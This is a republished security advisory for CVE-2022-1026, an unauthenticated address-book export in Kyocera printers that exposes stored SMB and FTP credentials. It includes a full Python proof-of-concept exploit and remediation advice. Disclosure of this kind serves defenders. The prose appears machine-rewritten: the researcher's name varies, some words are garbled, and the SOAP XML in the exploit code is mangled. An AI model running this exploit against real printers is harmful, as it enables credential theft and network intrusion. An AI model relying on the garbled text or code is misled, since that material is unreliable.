Last updated on Tue Mar 29 2022 1:29:15 PM GMT

Rapid7 researcher Aaron Henderson discovered that several models of Kyocera multifunction printers running vulnerable versions of Net View unwittingly expose sensitive user information, including usernames and passwords, via an export function insufficiently protected address book. This vulnerability is an instance of CWE-522: Insufficiently Protected Credentials, and has an estimated baseline CVSS 3.1 score of 8.6, as exposed credentials are used to authenticate to other endpoints , such as external FTP and SMB servers.

Product Description

Many Kyocera multifunction printers (MFPs) can be administered using Net Viewer. Two of these supported and tested MFP models are the ECOSYS M2640idw and the TASKalfa 406ci. These printers are commonly found in home office and corporate environments around the world.

Credit

This issue, CVE-2022-1026, was discovered by a security researcher Aaron Henderson from Rapid7. It is being disclosed in accordance with Rapid7’s Vulnerability Disclosure Policy.

Operation

Kyocera exposes a SOAP API on port 9091/TCP used for remote printer management via the Net Viewer thick client application. While the API supports authentication and the thick client performs this authentication, when capturing SOAP requests, it was observed that the specific request to retrieve an address book, `POST /ws/km -wsdl/setting/address_book` does not require an authenticated session to submit. These address books, in turn, contain stored email addresses, usernames and passwords, which are normally used to store scanned documents on external services or to send them to users via email. -mail.

Operating details

To exploit the vulnerability, an attacker only needs to be on a network that can reach the MFP’s listening SOAP service on port 9091/TCP. The screenshot below describes submitting an unauthenticated SOAP request to this service, `POST /ws/km-wsdl/setting/address_book` with the described XML.

This instructs the printer to prepare an address book object for download containing all sensitive data configured in the address book. The printer will respond with an address book enumeration object number, which is ‘5’ in this case:

Once this object number is received, an attacker can populate the “” value with this number in a SOAP request, wsa:Action get_personal_address_list, using the same POST endpoint, as shown below.

This will return the printer’s address book with all configured email addresses, FTP credentials and stored SMB network file share credentials for user scanning to network shares , in a fairly readable XML:

Finally, credentials can be collected from the provided login_password fields:

Leverage the proof of concept

A proof-of-concept (PoC) Python exploit is shown below. Note the time.sleep(5) call, which gives the printer time to generate the address book.

Python PoC code:

"""
Kyocera printer exploit
Extracts sensitive data stored in the printer address book, unauthenticated, including:
    *email addresses
    *SMB file share credentials used to write scan jobs to a network fileshare
    *FTP credentials
 
Author: Aaron Herndon, @ac3lives (Rapid7)
Date: 11/12/2021
Tested versions: 
    * ECOSYS M2640idw
    *  TASKalfa 406ci
    * 
 
Usage: 
python3 getKyoceraCreds.py printerip
"""
 
import requests
import xmltodict
import warnings
import sys
import time
warnings.filterwarnings("ignore")
 
url = "https://{}:9091/ws/km-wsdl/setting/address_book".format(sys.argv[1])
headers = {'content-type': 'application/soap+xml'}
# Submit an unauthenticated request to tell the printer that a new address book object creation is required
body = """<_soap-env3a_envelope _xmlns3a_soap-env="http://www.w3.org/2003/05/soap-envelope" _xmlns3a_soap-enc="http://www.w3.org/2003/05/soap-encoding" _xmlns3a_xsi="http://www.w3.org/2001/XMLSchema-instance" _xmlns3a_xsd="http://www.w3.org/2001/XMLSchema" _xmlns3a_wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" _xmlns3a_xop="http://www.w3.org/2004/08/xop/include" _xmlns3a_ns1="http://www.kyoceramita.com/ws/km-wsdl/setting/address_book"><_soap-env3a_header><_wsa3a_action _soap-env3a_mustunderstand="true">http://www.kyoceramita.com/ws/km-wsdl/setting/address_book/create_personal_address_enumeration<_soap-env3a_body><_ns13a_create_personal_address_enumerationrequest><_ns13a_number>25"""
 
response = requests.post(url,data=body,headers=headers, verify=False)
strResponse = response.content.decode('utf-8')
#print(strResponse)
 
 
parsed = xmltodict.parse(strResponse)
# The SOAP request returns XML with an object ID as an integer stored in kmaddrbook:enumeration. We need this object ID to request the data from the printer.
getNumber = parsed['SOAP-ENV:Envelope']['SOAP-ENV:Body']['kmaddrbook:create_personal_address_enumerationResponse']['kmaddrbook:enumeration']
 
body = """<_soap-env3a_envelope _xmlns3a_soap-env="http://www.w3.org/2003/05/soap-envelope" _xmlns3a_soap-enc="http://www.w3.org/2003/05/soap-encoding" _xmlns3a_xsi="http://www.w3.org/2001/XMLSchema-instance" _xmlns3a_xsd="http://www.w3.org/2001/XMLSchema" _xmlns3a_wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" _xmlns3a_xop="http://www.w3.org/2004/08/xop/include" _xmlns3a_ns1="http://www.kyoceramita.com/ws/km-wsdl/setting/address_book"><_soap-env3a_header><_wsa3a_action _soap-env3a_mustunderstand="true">http://www.kyoceramita.com/ws/km-wsdl/setting/address_book/get_personal_address_list<_soap-env3a_body><_ns13a_get_personal_address_listrequest><_ns13a_enumeration>{}""".format(getNumber)
 
print("Obtained address book object: {}. Waiting for book to populate".format(getNumber))
time.sleep(5)
print("Submitting request to retrieve the address book object...")
 
 
response = requests.post(url,data=body,headers=headers, verify=False)
strResponse = response.content.decode('utf-8')
#rint(strResponse)
 
parsed = xmltodict.parse(strResponse)
print(parsed['SOAP-ENV:Envelope']['SOAP-ENV:Body'])
 
print("nnObtained address book. Review the above response for credentials in objects such as 'login_password', 'login_name'")

Impact

The most likely attack scenario involving this vulnerability would be an attacker, who is already inside the local network perimeter, leveraging its ability to communicate directly with affected printers to learn usernames and credentials. stored SMB and FTP file server passwords. In the case of SMB credentials, these can then be leveraged to establish a presence in the Windows domain of the target networks.

Depending on how these external services are administered, the attacker may also be able to collect past (and future) print/scan jobs from the targeted printer, but the primary value of this vulnerability is lateral movement within the network. Note that the printer credentials themselves are not at risk (except in the case of reused passwords, of course), but the credentials to the services that the printer is normally supposed to store the Scanned documents are exposed via this vulnerability.

Remediation

First of all, the MFPs must never be reachable directly via the Internet. While this is true for most LAN-centric technologies, it is especially true for printers and scanners, which are popular targets for opportunistic attackers. These devices tend to only support weak authentication mechanisms, even at the best of times, and are rarely updated with firmware updates to fix security issues. Thus, as long as only trusted users can access these networked printers, the possibility of attack is limited only to insiders and attackers who have otherwise managed to already establish a presence on the local network.

At the time of this disclosure, no patches or updated firmware are available for the affected devices. The version information displayed on a vulnerable ECOSYS M2640idw device is shown below, and we believe the correct version number for this software is the intermediate version listed, “2S0_1000.005.0012S5_2000.002.505”.

Due to the lack of patches, Kyocera customers are advised to disable the SOAP interface running on port 9091/TCP of affected MFPs. Details on how to specifically disable this service can be found in the documentation for the specific MFP model. If SOAP access is required on the network for normal operation, users should ensure that address books do not contain sensitive and immutable passwords.

A possible configuration that would make this vulnerability questionable would be to only allow public and anonymous FTP or SMB write access (but not read access) for storing scanned documents, and another process to move these documents into securely over the network to their final destination. Exposing email addresses would remain, but this is of much less value to most attackers.

Disclosure schedule

  • November 2021: Issue identified by Aaron Herndon of Rapid7
  • Tue 16 November 2021: Contacted Kyocera main support and other support
  • Fri November 19, 2021: Open case number: CS211119002 with Kyocera support
  • Mon November 22, 2021: Details communicated to the supplier
  • Fri January 7, 2022: Open JPCERT/CC file number JVNVU#96890480
    • More reliable security-specific contact discovered at Kyocera

  • Wed January 19, 2022: Disclosure deadline extended to mid-March 2022
  • January-March 2022: Communication on Workarounds and Other Mitigation Measures
  • Fri, March 18, 2022: CVE-2022-1026 reserved
  • Tue 29 March 2022: Public Disclosure (this document)

Further reading:

NEVER MISS A BLOG

Get the latest security stories, insights and news today.

Subscribe

About The Author

Related Posts